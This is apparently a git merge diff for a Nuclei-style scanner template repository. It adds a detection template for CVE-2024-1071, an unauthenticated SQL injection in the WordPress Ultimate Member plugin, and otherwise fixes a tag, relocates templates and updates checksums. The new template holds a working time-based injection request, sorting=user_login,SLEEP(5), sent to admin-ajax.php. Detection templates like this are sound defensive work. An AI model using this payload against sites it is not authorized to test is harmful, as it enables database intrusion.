Merge branch 'main' into add-missing-token

.new-additions

@@ -7,6 +7,7 @@ http/cves/2023/CVE-2023-48777.yaml
 http/cves/2024/CVE-2024-0305.yaml
 http/cves/2024/CVE-2024-0713.yaml
 http/cves/2024/CVE-2024-1021.yaml
+http/cves/2024/CVE-2024-1071.yaml
 http/cves/2024/CVE-2024-1208.yaml
 http/cves/2024/CVE-2024-1209.yaml
 http/cves/2024/CVE-2024-1210.yaml

http/cves/2020/CVE-2020-27838.yaml

@@ -28,7 +28,7 @@ info:
     vendor: redhat
     product: keycloak
     shodan-query: "title:\"keycloak\""
-  tags: cve,cve2020,keyclock,exposure
+  tags: cve,cve2020,keycloak,exposure
 
 http:
   - method: GET
@@ -52,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a6e9bf7a3b64c5e90d619114c77ef26e4910bb56c4488208e2381e574562d66e022100944c1456d486efb48fc5d8d143759d157d22b7b23d81cffcf4cbd94219ae8cd0:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e340099dadc3710a63b8cc3e0182b0c1a738f7480c069fa5c39913092f31b39802201ad2dbae637d451dd3a442b8c8a7d2f0d5244240545b98ba4431a62241c66fa6:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-1071.yaml

@@ -0,0 +1,57 @@
+id: CVE-2024-1071
+
+info:
+  name: WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection
+  author: DhiyaneshDK,iamnooob
+  severity: critical
+  description: |
+    The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+  remediation: Fixed in 2.8.3
+  reference:
+    - https://www.wordfence.com/blog/2024/02/2063-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-ultimate-member-wordpress-plugin/
+    - https://securityonline.info/cve-2024-1071-wordpress-ultimate-member-plugin-under-active-attack/
+  classification:
+    cve-id: CVE-2024-1071
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 2
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/ultimate-member/"
+    zoomeye-query: app:"WordPress Ultimate Member Plugin"
+    fofa-query: body="/wp-content/plugins/ultimate-member"
+  tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin
+
+http:
+  - raw:
+      - |
+        GET /?p=1 HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        @timeout: 10s
+        POST /wp-admin/admin-ajax.php?action=um_get_members HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        directory_id=b9238&sorting=user_login,SLEEP(5)&nonce={{nonce}}
+
+    host-redirects: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration_2>=5'
+          - 'status_code_2 == 200'
+          - 'contains_all(body_2, "current_page", "total_pages")'
+        condition: and
+
+    extractors:
+      - type: regex
+        name: nonce
+        part: body
+        group: 1
+        regex:
+          - '"nonce":"([0-9a-z]+)"'
+        internal: true
+# digest: 4b0a00483046022100cbbf2eef879ba4fd92a1ea6d44bcd473dbc968afabbde5391d5969feba1bc4c7022100eb9710892e9d92fa4d14b16004b74b743d42abe45900eeef50caf239ea91aaea:922c64590222798bb761d5b6d8e72950

http/exposures/docker-daemon-exposed.yaml → http/misconfiguration/docker-daemon-exposed.yaml

@@ -38,4 +38,4 @@ http:
         regex:
           - '"ApiVersion":"(.*?)"'
         internal: true
-# digest: 4a0a0047304502204626aa849bc6837c86c193b5794710f7b01316c525f17924e8db7aa818772ec9022100f3c6d104e7d268933dbfbacd0b3ddf8049a9cc7fec4d9487cebbdc93877883d5:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502204626aa849bc6837c86c193b5794710f7b01316c525f17924e8db7aa818772ec9022100f3c6d104e7d268933dbfbacd0b3ddf8049a9cc7fec4d9487cebbdc93877883d5:922c64590222798bb761d5b6d8e72950

templates-checksum.txt

@@ -1025,7 +1025,7 @@ http/cves/2015/CVE-2015-1000012.yaml:16ae3cbb97f47db990f262b56574669badde6c1c
 http/cves/2015/CVE-2015-1427.yaml:16a80779904b2ba671b0717b0b2cfe7c698d3b6e
 http/cves/2015/CVE-2015-1503.yaml:bbde85fecee2c9277186ace655c7b9999b31cbd6
 http/cves/2015/CVE-2015-1579.yaml:286f1a1f3f288d36e236151507dc5a1786d458ed
-http/cves/2015/CVE-2015-1635.yaml:cf1676343deb98ac8409420c02d6ed74b4e63313
+http/cves/2015/CVE-2015-1635.yaml:d9cdcc5e3de664f5aee235f242cd144b460e7193
 http/cves/2015/CVE-2015-1880.yaml:66e75e88a179df677eb2456148f1f454111c1859
 http/cves/2015/CVE-2015-20067.yaml:c802b9066892a071e05d4b2d1534e1ef4479eb76
 http/cves/2015/CVE-2015-2067.yaml:35c180af06e763040631b3b182d9c087be7d432d
@@ -1709,7 +1709,7 @@ http/cves/2020/CVE-2020-27361.yaml:05e120b7de223a91a94eeee3b3849a2a3154f371
 http/cves/2020/CVE-2020-27467.yaml:f6f0f6d394335b8193c0a0713f74fb7f481c9401
 http/cves/2020/CVE-2020-27481.yaml:34dead4abe08a5b77da5e0f75b746ba0fae11a31
 http/cves/2020/CVE-2020-27735.yaml:9a4cbf8854eca231e079bf63c10f71041dd60889
-http/cves/2020/CVE-2020-27838.yaml:abf7cbb0f695c79ab6a3f3efc0be01c913e2dad1
+http/cves/2020/CVE-2020-27838.yaml:09845d829da92f52ad39528ea72893106622646e
 http/cves/2020/CVE-2020-27866.yaml:244c0b65ec85e620c013652da2ea6f378377d938
 http/cves/2020/CVE-2020-27982.yaml:aecf509f176fd6c8e7c487b487117399629aa3d3
 http/cves/2020/CVE-2020-27986.yaml:3cd78d1a09c1dc3b889156f644c1f784c26380d8
@@ -3050,6 +3050,7 @@ http/cves/2024/CVE-2024-0352.yaml:e324d6ccb69d2bee50aa487f5e068cc005c715d8
 http/cves/2024/CVE-2024-0713.yaml:997f1179701220ba776e8da4e321042b950c529a
 http/cves/2024/CVE-2024-1021.yaml:6f94c1cf051951cac002787a5f971c60471f410d
 http/cves/2024/CVE-2024-1061.yaml:b27c2c94969a04256555997add9575b0b39f1ca4
+http/cves/2024/CVE-2024-1071.yaml:672dd1ef0240ede4f06d3b98caf96f2f14bd1e8e
 http/cves/2024/CVE-2024-1208.yaml:6f0363cecc95a2187f9fbca30620a2d39d87eb15
 http/cves/2024/CVE-2024-1209.yaml:36f848394da33f75c2198b8f5b9081f212b3ecd1
 http/cves/2024/CVE-2024-1210.yaml:1333fe26c55e1b4e44bcfdc0e0de5226a053f949
@@ -4324,6 +4325,7 @@ http/exposures/configs/debug-vars.yaml:0b108f2c2468d3700a7a837b79eec21e3d060785
 http/exposures/configs/detect-drone-config.yaml:8dcfc65408172b76a554d1f5970d2c3cb1edb514
 http/exposures/configs/django-variables-exposed.yaml:30ad3076e779010142f49d0a27c4bffee7e40743
 http/exposures/configs/docker-compose-config.yaml:c09c54ae8ef8b7eb9d1afea7fe19ef6b2b0169d3
+http/exposures/configs/dockercfg-config.yaml:9379a60ea042ee284d0e6075c43660b6267cb383
 http/exposures/configs/dockerfile-hidden-disclosure.yaml:5b74c22b6a4d55f0b5cb8fd47e9a181453340d63
 http/exposures/configs/dompdf-config.yaml:d2e8de61e12412a8bab99372c572723499a803f7
 http/exposures/configs/editor-exposure.yaml:ffe1254a1b48408b7556b11a5c6bf9cd44521004
@@ -4438,7 +4440,6 @@ http/exposures/configs/wpconfig-aws-keys.yaml:960a11b79d35bc5a3b164fc7e426fb02b5
 http/exposures/configs/xprober-service.yaml:3480056d644ec37a3b9ce5e81f55b9b279d66880
 http/exposures/configs/yii-debugger.yaml:d7c68b7d7e09cdd6933e07f4b0274cde60eb3671
 http/exposures/configs/zend-config-file.yaml:52e91071cd3c7deef4d59c107bb81cb7c0024793
-http/exposures/docker-daemon-exposed.yaml:883ec260bc484282956e57e6ce41d10322e5bb48
 http/exposures/files/angular-json.yaml:33a8441b1e158d34f7f877820ba705662f9ba017
 http/exposures/files/apache-licenserc.yaml:2a3d72cad226944f1ecf05789504cc811b77e5bc
 http/exposures/files/apdisk-disclosure.yaml:2c1e02f1fe0bf0c57cc1baf6d1fa6712b32a1856
@@ -4646,7 +4647,6 @@ http/exposures/tokens/discord/discord-clientid.yaml:72cd3ba959b5ccfd39114d896dd6
 http/exposures/tokens/discord/discord-clientsecret.yaml:61eb81f4965527fed4a4a697f65a75bede6cbb2f
 http/exposures/tokens/discord/discord-token.yaml:dba1ad139407adbc6b39f2fe2436648f46a63340
 http/exposures/tokens/discord/discord-webhook.yaml:663a35887f585cdf1cfbac2865cd3fccb44a7056
-http/exposures/tokens/docker/dockercfg-config.yaml:9379a60ea042ee284d0e6075c43660b6267cb383
 http/exposures/tokens/doppler/doppler-token.yaml:215c31e60f82a2e0f9e6d3906900ee90eb6f527e
 http/exposures/tokens/droneci/droneci-accesstoken.yaml:f99e4f59d03d5d556ba3f913b8aa644d0cad124d
 http/exposures/tokens/dropbox/dropbox-long-token.yaml:790f82351674ff3f17d3e8710bcbd786544222e9
@@ -4950,6 +4950,7 @@ http/misconfiguration/deos-openview-admin.yaml:51a5586a8abec23b8177b2ab9a3bdfe9d
 http/misconfiguration/dgraph-dashboard-exposure.yaml:f78d8b451116601b9669874f446e1e0288c0200b
 http/misconfiguration/django-debug-detect.yaml:e7c45908268a0883ef221e205124b251307d5a64
 http/misconfiguration/dlink-config-dump.yaml:a03aa2655a8a532b17f35a3359a8619cab72b3d2
+http/misconfiguration/docker-daemon-exposed.yaml:840bdb31f81cbeaa2b38bc57b6c1a51cc6007946
 http/misconfiguration/docker-registry.yaml:5c7611723d46851a846d043b8fca50d505e5870f
 http/misconfiguration/docmosis-tornado-server.yaml:f1b6f28d042655fb76f80a329f1d252156dd1e88
 http/misconfiguration/doris-dashboard.yaml:bb6e1b170aec39489117c28663f92f97df6f09c5
@@ -7958,7 +7959,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
 ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
 ssl/wildcard-tls.yaml:f1d29ec45ddad271d388c2e8fc28026fc24a04a4
-templates-checksum.txt:25710033d915713b010a69912b1e03984c536403
+templates-checksum.txt:f5787843057a21375f03c72553e68cc3e4f0149d
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4